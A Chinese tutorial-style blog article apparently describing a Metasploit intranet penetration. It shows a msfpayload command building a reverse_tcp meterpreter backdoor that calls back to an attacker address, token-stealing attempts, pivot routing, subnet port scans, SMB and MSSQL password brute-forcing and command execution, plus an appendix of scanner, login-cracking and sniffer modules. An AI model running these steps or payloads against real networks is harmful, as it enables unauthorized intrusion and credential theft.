科普:msf内网渗透实例

一直以来很想用msf实验一次内网渗透,体验一下内网渗透的快感。在内网里的世界也更大。

话不多说,让我们跟着节奏走。要用msf中的meterpreter进行后续渗透 首先要有一个反弹的shell,这里介绍两种payload

Windows/meterpreter/reverse_tcp

Windows/meterpreter/reverse_https  windows/meterpreter/reverse_http

后面的http/https 可以过防火墙,但是有的时候在得到反弹shell之后.会遇到命令无回显的情况.这个问题。参考国外一些博客的说法是 将监听端口改为443便好。

生成反弹后门的语句大家都应该不陌生

Msfpayloadwindows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=443 R | \msfencode –b ‘’ –t exe –o root/Desktop/sx.exe

然后将sx.exe传到shell中运行,之后便会反弹回一个meterpreter的shell。

点击查看原图

得到会话后首先看了下有哪些令牌可以盗取.首先我们要载入incognito模块.然后执行list_tokens–u命令查看有哪些存在令牌。

点击查看原图

之后我们尝试一下劫持令牌

点击查看原图

但很不幸 在这里失败了.当然不是因为不是system权限 我也见过有人不是system权限照样劫持了。(关于incognito的更多了解请跨步这http://www.offensive-security.com/metasploit-unleashed/Fun_With_Incognito

既然劫持不了这里便对内网整个网络进行扫描探测.

对内网常见端口进行探测 21(ftp)22(ssh) 25(smtp) 443 445(smb) ,1433(mssql) 3306(mysql)并尝试简单的端口入侵.

而msf下正好有个批量扫端口的模块,不过在扫描工作开始前要先添加路由表实现跨路由访问内网的设置。

简单先看下此时victim的ip和网段。然后routeadd 网关ip 子网掩码 session值

点击查看原图

之后加载portscan模块对整个c段进行探测。

点击查看原图

点击查看原图

在大约5分钟后,整个c段的扫描便完了。发现都是windows的主机,然后进行smb弱口令探测(这里可以体现社工的思想,因为如果在这台机子上抓到administrator的hash破解后便可以加在字典里尝试。可以这台机子上除了admin就是admin ==|| 都是hacker自己加的)

但是如大家所料,没有一个中枪 ==!

那么再mssql吧 刚看到很多的1433

加载mssql_ping模块 大概看看(这里不加载此模块也可以,只是为了确认前面的扫描是否正确。)

点击查看原图

在整个c段里大概发现了20台左右。之后进行sa用户名的爆破。

这里使用的是scanner/mssql/mssql_login(这里忘了截图 各位大侠自行info,小生不好意思啊),这次人品爆了 发现有个sa的弱口令密码是sa。

之后简单的使用mssql_exac模块尝试了一下。

点击查看原图

到这就中午了,剩下的我也就没有继续了,内网渗透博大精深,看似简单却又有很多的难以预料的问题。

附录

这里我整理了一下metaspliot里探测一些服务的模块

端口扫描

auxiliary/scanner/portscan
scanner/portscan/ack        ACK防火墙扫描
scanner/portscan/ftpbounce  FTP跳端口扫描
scanner/portscan/syn        SYN端口扫描
scanner/portscan/tcp        TCP端口扫描
scanner/portscan/xmas       TCP”XMas”端口扫描

smb扫描

smb枚举auxiliary/scanner/smb/smb_enumusers
返回DCERPC信息auxiliary/scanner/smb/pipe_dcerpc_auditor
扫描SMB2协议auxiliary/scanner/smb/smb2
扫描smb共享文件auxiliary/scanner/smb/smb_enumshares
枚举系统上的用户auxiliary/scanner/smb/smb_enumusers
SMB登录auxiliary/scanner/smb/smb_login
SMB登录use windows/smb/psexec(通过md5值登录)
扫描组的用户auxiliary/scanner/smb/smb_lookupsid
扫描系统版本auxiliary/scanner/smb/smb_version

mssql扫描(端口tcp1433udp1434)

admin/mssql/mssql_enum     MSSQL枚举
admin/mssql/mssql_exec     MSSQL执行命令
admin/mssql/mssql_sql      MSSQL查询
scanner/mssql/mssql_login  MSSQL登陆工具
scanner/mssql/mssql_ping   测试MSSQL的存在和信息

另外还有一个mssql_payload的模块 利用使用的

smtp扫描

smtp枚举auxiliary/scanner/smtp/smtp_enum
扫描smtp版本auxiliary/scanner/smtp/smtp_version

snmp扫描

通过snmp扫描设备auxiliary/scanner/snmp/community

ssh扫描

ssh登录auxiliary/scanner/ssh/ssh_login
ssh公共密钥认证登录auxiliary/scanner/ssh/ssh_login_pubkey
扫描ssh版本测试auxiliary/scanner/ssh/ssh_version

telnet扫描

telnet登录auxiliary/scanner/telnet/telnet_login
扫描telnet版本auxiliary/scanner/telnet/telnet_version

tftp扫描

扫描tftp的文件auxiliary/scanner/tftp/tftpbrute

ftp版本扫描scanner/ftp/anonymous

ARP扫描

auxiliary/scanner/discovery/arp_sweep

扫描UDP服务的主机auxiliary/scanner/discovery/udp_probe
检测常用的UDP服务auxiliary/scanner/discovery/udp_sweep
sniffer密码auxiliary/sniffer/psnuffle
snmp扫描scanner/snmp/community
vnc扫描无认证扫描scanner/vnc/vnc_none_auth

注:文章转载图片自动加LOGO 若觉得看不清可以移步原文:http://x0day.sinaapp.com/metaspliot-network-hacking.html

91ri.org:本文写的还不是很完整,而且内容较为简单,可以作为一篇新手学习文,大家可以在本机搭建起环境按文中做测试。有兴趣学习Linux渗透的可以参考清华的《Linux系统攻防对抗实践

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。